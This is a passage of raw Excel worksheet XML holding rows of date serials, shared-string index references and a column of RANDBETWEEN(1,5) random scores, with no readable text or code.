      <c r="B1768" t="s">
        <v>13</v>
      </c>
      <c r="C1768" t="s">
        <v>10</v>
      </c>
      <c r="D1768" t="s">
        <v>330</v>
      </c>
      <c r="E1768" t="s">
        <v>1833</v>
      </c>
      <c r="F1768">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1769" s="1">
        <v>43524.652337962965</v>
      </c>
      <c r="B1769" t="s">
        <v>35</v>
      </c>
      <c r="C1769" t="s">
        <v>6</v>
      </c>
      <c r="D1769" t="s">
        <v>67</v>
      </c>
      <c r="E1769" t="s">
        <v>1834</v>
      </c>
      <c r="F1769">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1770" s="1">
        <v>43524.63453703704</v>
      </c>
      <c r="B1770" t="s">
        <v>5</v>
      </c>
      <c r="C1770" t="s">
        <v>10</v>
      </c>
      <c r="D1770" t="s">
        <v>46</v>
      </c>
      <c r="E1770" t="s">
        <v>1835</v>
      </c>
      <c r="F1770">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1771" s="1">
        <v>43524.634398148148</v>
      </c>
      <c r="B1771" t="s">
        <v>5</v>
      </c>
      <c r="C1771" t="s">
        <v>6</v>
      </c>
      <c r="D1771" t="s">
        <v>25</v>
      </c>
      <c r="E1771" t="s">
        <v>828</v>
      </c>
      <c r="F1771">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1772" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1772" s="1">
        <v>43524.633020833331</v>
      </c>
      <c r="B1772" t="s">
        <v>19</v>
      </c>
      <c r="C1772" t="s">
        <v>10</v>
      </c>
      <c r="D1772" t="s">
        <v>192</v>
      </c>
      <c r="E1772" s="2" t="s">
        <v>1836</v>
      </c>
      <c r="F1772">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1773" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A1773" s="1">
        <v>43524.609988425924</v>
      </c>
      <c r="B1773" t="s">
        <v>5</v>
      </c>
      <c r="C1773" t="s">
        <v>10</v>
      </c>
      <c r="D1773" t="s">
        <v>6</v>
      </c>
      <c r="E1773" s="2" t="s">
        <v>1837</v>
      </c>
      <c r="F1773">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1774" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A1774" s="1">
        <v>43524.605763888889</v>
      </c>
      <c r="B1774" t="s">
        <v>13</v>
      </c>
      <c r="C1774" t="s">
        <v>10</v>
      </c>
      <c r="D1774" t="s">
        <v>86</v>
      </c>
      <c r="E1774" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="F1774">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1775" s="1">
        <v>43524.595532407409</v>
      </c>
      <c r="B1775" t="s">
        <v>19</v>
      </c>
      <c r="C1775" t="s">
        <v>10</v>
      </c>
      <c r="D1775" t="s">
        <v>56</v>
      </c>
      <c r="E1775" t="s">
        <v>1839</v>
      </c>
      <c r="F1775">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1776" s="1">
        <v>43524.570393518516</v>
      </c>
      <c r="B1776" t="s">
        <v>13</v>
      </c>
      <c r="C1776" t="s">
        <v>10</v>
      </c>
      <c r="D1776" t="s">
        <v>80</v>
      </c>
      <c r="E1776" t="s">
        <v>1840</v>
      </c>
      <c r="F1776">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1777" s="1">
        <v>43524.551261574074</v>
      </c>
      <c r="B1777" t="s">
        <v>19</v>
      </c>
      <c r="C1777" t="s">
        <v>10</v>
      </c>
      <c r="D1777" t="s">
        <v>192</v>
      </c>
      <c r="E1777" t="s">
        <v>1841</v>
      </c>
      <c r="F1777">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1778" s="1">
        <v>43524.549479166664</v>
      </c>
      <c r="B1778" t="s">
        <v>13</v>
      </c>
      <c r="C1778" t="s">
        <v>10</v>
      </c>
      <c r="D1778" t="s">
        <v>33</v>
      </c>
      <c r="E1778" t="s">
        <v>1842</v>
      </c>
      <c r="F1778">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1779" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1779" s="1">
        <v>43524.545648148145</v>
      </c>
      <c r="B1779" t="s">
        <v>13</v>
      </c>
      <c r="C1779" t="s">
        <v>6</v>
      </c>
      <c r="D1779" t="s">
        <v>25</v>
      </c>
      <c r="E1779" s="2" t="s">
        <v>1843</v>
      </c>
      <c r="F1779">
        <f t="shared" ca="1" si="27"/>
        <v>1</v>
      </c>
    </row>
    <row r="1780" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1780" s="1">
        <v>43524.543969907405</v>
      </c>
      <c r="B1780" t="s">
        <v>19</v>
      </c>
      <c r="C1780" t="s">
        <v>10</v>
      </c>
      <c r="D1780" t="s">
        <v>112</v>
      </c>
      <c r="E1780" s="2" t="s">
        <v>1844</v>
      </c>
      <c r="F1780">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1781" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1781" s="1">
        <v>43524.539456018516</v>
      </c>
      <c r="B1781" t="s">
        <v>35</v>
      </c>
      <c r="C1781" t="s">
        <v>10</v>
      </c>
      <c r="D1781" t="s">
        <v>36</v>
      </c>
      <c r="E1781" s="2" t="s">
        <v>1845</v>
      </c>
      <c r="F1781">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1782" s="1">
        <v>43524.534259259257</v>
      </c>
      <c r="B1782" t="s">
        <v>5</v>
      </c>
      <c r="C1782" t="s">
        <v>1408</v>
      </c>
      <c r="E1782" t="s">
        <v>1847</v>
      </c>
      <c r="F1782">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1783" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1783" s="1">
        <v>43524.525243055556</v>
      </c>
      <c r="B1783" t="s">
        <v>19</v>
      </c>
      <c r="C1783" t="s">
        <v>10</v>
      </c>
      <c r="D1783" t="s">
        <v>14</v>
      </c>
      <c r="E1783" s="2" t="s">
        <v>1848</v>
      </c>
      <c r="F1783">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1784" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1784" s="1">
        <v>43524.525208333333</v>
      </c>
      <c r="B1784" t="s">
        <v>19</v>
      </c>
      <c r="C1784" t="s">
        <v>10</v>
      </c>
      <c r="D1784" t="s">
        <v>14</v>
      </c>
      <c r="E1784" s="2" t="s">
        <v>1848</v>
      </c>
      <c r="F1784">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1785" s="1">
        <v>43524.47928240741</v>
      </c>
      <c r="B1785" t="s">
        <v>13</v>
      </c>
      <c r="C1785" t="s">
        <v>10</v>
      </c>
      <c r="D1785" t="s">
        <v>107</v>
      </c>
      <c r="E1785" t="s">
        <v>1849</v>
      </c>
      <c r="F1785">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1786" s="1">
        <v>43524.466840277775</v>
      </c>
      <c r="B1786" t="s">
        <v>9</v>
      </c>
      <c r="C1786" t="s">
        <v>71</v>
      </c>
      <c r="E1786" t="s">
        <v>1850</v>
      </c>
      <c r="F1786">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1787" s="1">
        <v>43524.463460648149</v>
      </c>
      <c r="B1787" t="s">
        <v>5</v>
      </c>
      <c r="C1787" t="s">
        <v>6</v>
      </c>
      <c r="D1787" t="s">
        <v>25</v>
      </c>
      <c r="E1787" t="s">
        <v>1851</v>
      </c>
      <c r="F1787">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1788" s="1">
        <v>43524.462604166663</v>
      </c>
      <c r="B1788" t="s">
        <v>13</v>
      </c>
      <c r="C1788" t="s">
        <v>6</v>
      </c>
      <c r="D1788" t="s">
        <v>114</v>
      </c>
      <c r="E1788" t="s">
        <v>1852</v>
      </c>
      <c r="F1788">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1789" s="1">
        <v>43524.462222222224</v>
      </c>
      <c r="B1789" t="s">
        <v>13</v>
      </c>
      <c r="C1789" t="s">
        <v>10</v>
      </c>
      <c r="D1789" t="s">
        <v>667</v>
      </c>
      <c r="E1789" t="s">
        <v>1853</v>
      </c>
      <c r="F1789">
        <f t="shared" ca="1" si="27"/>
        <v>2</v>
      </c>
    </row>
    <row r="1790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1790" s="1">
        <v>43524.458981481483</v>
      </c>
      <c r="B1790" t="s">
        <v>5</v>
      </c>
      <c r="C1790" t="s">
        <v>48</v>
      </c>
      <c r="E1790" t="s">
        <v>1854</v>
      </c>
      <c r="F1790">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1791" s="1">
        <v>43524.45894675926</v>
      </c>
      <c r="B1791" t="s">
        <v>5</v>
      </c>
      <c r="C1791" t="s">
        <v>48</v>
      </c>
      <c r="E1791" t="s">
        <v>1854</v>
      </c>
      <c r="F1791">
        <f t="shared" ca="1" si="27"/>
        <v>5</v>
      </c>
    </row>
    <row r="1792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1792" s="1">
        <v>43524.455057870371</v>
      </c>
      <c r="B1792" t="s">
        <v>5</v>
      </c>
      <c r="C1792" t="s">
        <v>10</v>
      </c>
      <c r="D1792" t="s">
        <v>89</v>
      </c>
      <c r="E1792" t="s">
        <v>1855</v>
      </c>
      <c r="F1792">
        <f t="shared" ca="1" si="27"/>
        <v>4</v>
      </c>
    </row>
    <row r="1793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1793" s="1">
        <v>43524.44630787037</v>
      </c>
      <c r="B1793" t="s">
        <v>19</v>
      </c>
      <c r="C1793" t="s">
        <v>10</v>
      </c>
      <c r="D1793" t="s">
        <v>20</v>
      </c>
      <c r="E1793" t="s">
        <v>1856</v>
      </c>
      <c r="F1793">
        <f t="shared" ca="1" si="27"/>
        <v>3</v>
      </c>
    </row>
    <row r="1794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1794" s="1">
        <v>43524.440925925926</v>
      </c>
      <c r="B1794" t="s">
        <v>5</v>
      </c>
      <c r="C1794" t="s">
        <v>17</v>
      </c>
      <c r="F1794">
        <f t="shared" ref="F1794:F1857" ca="1" si="28">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1795" s="1">
        <v>43524.439652777779</v>
      </c>
      <c r="B1795" t="s">
        <v>13</v>
      </c>
      <c r="C1795" t="s">
        <v>10</v>
      </c>
      <c r="D1795" t="s">
        <v>381</v>
      </c>
      <c r="E1795" t="s">
        <v>1857</v>
      </c>
      <c r="F1795">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1796" s="1">
        <v>43524.435254629629</v>
      </c>
      <c r="B1796" t="s">
        <v>5</v>
      </c>
      <c r="C1796" t="s">
        <v>10</v>
      </c>
      <c r="D1796" t="s">
        <v>89</v>
      </c>
      <c r="E1796" t="s">
        <v>1858</v>
      </c>
      <c r="F1796">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1797" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1797" s="1">
        <v>43524.431238425925</v>
      </c>
      <c r="B1797" t="s">
        <v>5</v>
      </c>
      <c r="C1797" t="s">
        <v>6</v>
      </c>
      <c r="D1797" t="s">
        <v>194</v>
      </c>
      <c r="E1797" s="2" t="s">
        <v>1859</v>
      </c>
      <c r="F1797">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1798" s="1">
        <v>43524.419062499997</v>
      </c>
      <c r="B1798" t="s">
        <v>13</v>
      </c>
      <c r="C1798" t="s">
        <v>10</v>
      </c>
      <c r="D1798" t="s">
        <v>163</v>
      </c>
      <c r="E1798" t="s">
        <v>1860</v>
      </c>
      <c r="F1798">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1799" s="1">
        <v>43524.411562499998</v>
      </c>
      <c r="B1799" t="s">
        <v>5</v>
      </c>
      <c r="C1799" t="s">
        <v>10</v>
      </c>
      <c r="D1799" t="s">
        <v>17</v>
      </c>
      <c r="E1799" t="s">
        <v>1861</v>
      </c>
      <c r="F1799">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1800" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1800" s="1">
        <v>43524.378969907404</v>
      </c>
      <c r="B1800" t="s">
        <v>19</v>
      </c>
      <c r="C1800" t="s">
        <v>173</v>
      </c>
      <c r="E1800" s="2" t="s">
        <v>1862</v>
      </c>
      <c r="F1800">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1801" s="1">
        <v>43524.378912037035</v>
      </c>
      <c r="B1801" t="s">
        <v>13</v>
      </c>
      <c r="C1801" t="s">
        <v>48</v>
      </c>
      <c r="E1801" t="s">
        <v>1863</v>
      </c>
      <c r="F1801">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1802" s="1">
        <v>43524.367708333331</v>
      </c>
      <c r="B1802" t="s">
        <v>5</v>
      </c>
      <c r="C1802" t="s">
        <v>10</v>
      </c>
      <c r="D1802" t="s">
        <v>36</v>
      </c>
      <c r="E1802" t="s">
        <v>1864</v>
      </c>
      <c r="F1802">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1803" s="1">
        <v>43524.350335648145</v>
      </c>
      <c r="B1803" t="s">
        <v>5</v>
      </c>
      <c r="C1803" t="s">
        <v>10</v>
      </c>
      <c r="D1803" t="s">
        <v>290</v>
      </c>
      <c r="E1803" t="s">
        <v>1865</v>
      </c>
      <c r="F1803">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1804" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1804" s="1">
        <v>43524.342881944445</v>
      </c>
      <c r="B1804" t="s">
        <v>19</v>
      </c>
      <c r="C1804" t="s">
        <v>461</v>
      </c>
      <c r="E1804" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="F1804">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1805" s="1">
        <v>43524.325856481482</v>
      </c>
      <c r="B1805" t="s">
        <v>35</v>
      </c>
      <c r="C1805" t="s">
        <v>41</v>
      </c>
      <c r="E1805" t="s">
        <v>1867</v>
      </c>
      <c r="F1805">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1806" s="1">
        <v>43524.325787037036</v>
      </c>
      <c r="B1806" t="s">
        <v>5</v>
      </c>
      <c r="C1806" t="s">
        <v>71</v>
      </c>
      <c r="E1806" t="s">
        <v>1868</v>
      </c>
      <c r="F1806">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1807" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1807" s="1">
        <v>43524.283229166664</v>
      </c>
      <c r="B1807" t="s">
        <v>5</v>
      </c>
      <c r="C1807" t="s">
        <v>48</v>
      </c>
      <c r="E1807" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="F1807">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1808" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1808" s="1">
        <v>43524.265601851854</v>
      </c>
      <c r="B1808" t="s">
        <v>13</v>
      </c>
      <c r="C1808" t="s">
        <v>10</v>
      </c>
      <c r="D1808" t="s">
        <v>20</v>
      </c>
      <c r="E1808" s="2" t="s">
        <v>1870</v>
      </c>
      <c r="F1808">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1809" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1809" s="1">
        <v>43524.252500000002</v>
      </c>
      <c r="B1809" t="s">
        <v>13</v>
      </c>
      <c r="C1809" t="s">
        <v>48</v>
      </c>
      <c r="E1809" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="F1809">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1810" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1810" s="1">
        <v>43524.249155092592</v>
      </c>
      <c r="B1810" t="s">
        <v>5</v>
      </c>
      <c r="C1810" t="s">
        <v>71</v>
      </c>
      <c r="E1810" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="F1810">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1811" s="1">
        <v>43524.22934027778</v>
      </c>
      <c r="B1811" t="s">
        <v>13</v>
      </c>
      <c r="C1811" t="s">
        <v>48</v>
      </c>
      <c r="E1811" t="s">
        <v>1873</v>
      </c>
      <c r="F1811">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1812" s="1">
        <v>43524.192604166667</v>
      </c>
      <c r="B1812" t="s">
        <v>19</v>
      </c>
      <c r="C1812" t="s">
        <v>776</v>
      </c>
      <c r="E1812" t="s">
        <v>1874</v>
      </c>
      <c r="F1812">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1813" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1813" s="1">
        <v>43524.161307870374</v>
      </c>
      <c r="B1813" t="s">
        <v>19</v>
      </c>
      <c r="C1813" t="s">
        <v>48</v>
      </c>
      <c r="E1813" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="F1813">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1814" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1814" s="1">
        <v>43524.142199074071</v>
      </c>
      <c r="B1814" t="s">
        <v>19</v>
      </c>
      <c r="C1814" t="s">
        <v>43</v>
      </c>
      <c r="E1814" s="2" t="s">
        <v>1876</v>
      </c>
      <c r="F1814">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1815" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1815" s="1">
        <v>43524.133564814816</v>
      </c>
      <c r="B1815" t="s">
        <v>19</v>
      </c>
      <c r="C1815" t="s">
        <v>41</v>
      </c>
      <c r="E1815" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="F1815">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1816" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1816" s="1">
        <v>43524.11005787037</v>
      </c>
      <c r="B1816" t="s">
        <v>5</v>
      </c>
      <c r="C1816" t="s">
        <v>71</v>
      </c>
      <c r="E1816" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="F1816">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1817" s="1">
        <v>43524.109606481485</v>
      </c>
      <c r="B1817" t="s">
        <v>13</v>
      </c>
      <c r="C1817" t="s">
        <v>41</v>
      </c>
      <c r="E1817" t="s">
        <v>1879</v>
      </c>
      <c r="F1817">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1818" s="1">
        <v>43524.09207175926</v>
      </c>
      <c r="B1818" t="s">
        <v>1305</v>
      </c>
      <c r="C1818" t="s">
        <v>60</v>
      </c>
      <c r="E1818" t="s">
        <v>1880</v>
      </c>
      <c r="F1818">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1819" s="1">
        <v>43524.077013888891</v>
      </c>
      <c r="B1819" t="s">
        <v>19</v>
      </c>
      <c r="C1819" t="s">
        <v>173</v>
      </c>
      <c r="E1819" t="s">
        <v>1881</v>
      </c>
      <c r="F1819">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1820" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1820" s="1">
        <v>43524.048333333332</v>
      </c>
      <c r="B1820" t="s">
        <v>35</v>
      </c>
      <c r="C1820" t="s">
        <v>10</v>
      </c>
      <c r="D1820" t="s">
        <v>36</v>
      </c>
      <c r="E1820" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="F1820">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1821" s="1">
        <v>43524.004803240743</v>
      </c>
      <c r="B1821" t="s">
        <v>5</v>
      </c>
      <c r="C1821" t="s">
        <v>10</v>
      </c>
      <c r="D1821" t="s">
        <v>151</v>
      </c>
      <c r="E1821" t="s">
        <v>1883</v>
      </c>
      <c r="F1821">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1822" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1822" s="1">
        <v>43523.938009259262</v>
      </c>
      <c r="B1822" t="s">
        <v>13</v>
      </c>
      <c r="C1822" t="s">
        <v>314</v>
      </c>
      <c r="E1822" s="2" t="s">
        <v>1884</v>
      </c>
      <c r="F1822">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1823" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1823" s="1">
        <v>43523.891944444447</v>
      </c>
      <c r="B1823" t="s">
        <v>9</v>
      </c>
      <c r="C1823" t="s">
        <v>10</v>
      </c>
      <c r="D1823" t="s">
        <v>6</v>
      </c>
      <c r="E1823" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="F1823">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1824" s="1">
        <v>43523.815289351849</v>
      </c>
      <c r="B1824" t="s">
        <v>19</v>
      </c>
      <c r="C1824" t="s">
        <v>6</v>
      </c>
      <c r="D1824" t="s">
        <v>821</v>
      </c>
      <c r="E1824" t="s">
        <v>1886</v>
      </c>
      <c r="F1824">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1825" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1825" s="1">
        <v>43523.714791666665</v>
      </c>
      <c r="B1825" t="s">
        <v>1305</v>
      </c>
      <c r="C1825" t="s">
        <v>10</v>
      </c>
      <c r="D1825" t="s">
        <v>80</v>
      </c>
      <c r="E1825" s="2" t="s">
        <v>1887</v>
      </c>
      <c r="F1825">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1826" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1826" s="1">
        <v>43523.713622685187</v>
      </c>
      <c r="B1826" t="s">
        <v>19</v>
      </c>
      <c r="C1826" t="s">
        <v>10</v>
      </c>
      <c r="D1826" t="s">
        <v>92</v>
      </c>
      <c r="E1826" s="2" t="s">
        <v>1888</v>
      </c>
      <c r="F1826">
        <f t="shared" ca="1" si="28"/>
        <v>3</v>
      </c>
    </row>
    <row r="1827" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1827" s="1">
        <v>43523.705266203702</v>
      </c>
      <c r="B1827" t="s">
        <v>13</v>
      </c>
      <c r="C1827" t="s">
        <v>10</v>
      </c>
      <c r="D1827" t="s">
        <v>46</v>
      </c>
      <c r="E1827" s="2" t="s">
        <v>1889</v>
      </c>
      <c r="F1827">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1828" s="1">
        <v>43523.694560185184</v>
      </c>
      <c r="B1828" t="s">
        <v>35</v>
      </c>
      <c r="C1828" t="s">
        <v>10</v>
      </c>
      <c r="D1828" t="s">
        <v>271</v>
      </c>
      <c r="E1828" t="s">
        <v>1890</v>
      </c>
      <c r="F1828">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1829" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1829" s="1">
        <v>43523.679178240738</v>
      </c>
      <c r="B1829" t="s">
        <v>19</v>
      </c>
      <c r="C1829" t="s">
        <v>144</v>
      </c>
      <c r="E1829" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="F1829">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1830" s="1">
        <v>43523.677476851852</v>
      </c>
      <c r="B1830" t="s">
        <v>19</v>
      </c>
      <c r="C1830" t="s">
        <v>10</v>
      </c>
      <c r="D1830" t="s">
        <v>86</v>
      </c>
      <c r="E1830" t="s">
        <v>1892</v>
      </c>
      <c r="F1830">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1831" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1831" s="1">
        <v>43523.673229166663</v>
      </c>
      <c r="B1831" t="s">
        <v>5</v>
      </c>
      <c r="C1831" t="s">
        <v>144</v>
      </c>
      <c r="E1831" s="2" t="s">
        <v>1893</v>
      </c>
      <c r="F1831">
        <f t="shared" ca="1" si="28"/>
        <v>2</v>
      </c>
    </row>
    <row r="1832" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1832" s="1">
        <v>43523.671643518515</v>
      </c>
      <c r="B1832" t="s">
        <v>5</v>
      </c>
      <c r="C1832" t="s">
        <v>10</v>
      </c>
      <c r="D1832" t="s">
        <v>14</v>
      </c>
      <c r="E1832" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="F1832">
        <f t="shared" ca="1" si="28"/>
        <v>4</v>
      </c>
    </row>
    <row r="1833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1833" s="1">
        <v>43523.66547453704</v>
      </c>
      <c r="B1833" t="s">
        <v>13</v>
      </c>
      <c r="C1833" t="s">
        <v>16</v>
      </c>
      <c r="E1833" t="s">
        <v>1895</v>
      </c>
      <c r="F1833">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1834" s="1">
        <v>43523.654085648152</v>
      </c>
      <c r="B1834" t="s">
        <v>19</v>
      </c>
      <c r="C1834" t="s">
        <v>10</v>
      </c>
      <c r="D1834" t="s">
        <v>36</v>
      </c>
      <c r="E1834" t="s">
        <v>1896</v>
      </c>
      <c r="F1834">
        <f t="shared" ca="1" si="28"/>
        <v>5</v>
      </c>
    </row>
    <row r="1835" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1835" s="1">
        <v>43523.647905092592</v>
      </c>
      <c r="B1835" t="s">
        <v>19</v>
      </c>
      <c r="C1835" t="s">
        <v>10</v>
      </c>
      <c r="D1835" t="s">
        <v>20</v>
      </c>
      <c r="E1835" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="F1835">
        <f t="shared" ca="1" si="28"/>
        <v>1</v>
      </c>
    </row>
    <row r="1836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1836" s="1">
        <v>43523.620474537034</v>
      </c>
      <c r="B1836" t="s">
        <v>13</v>
      </c>
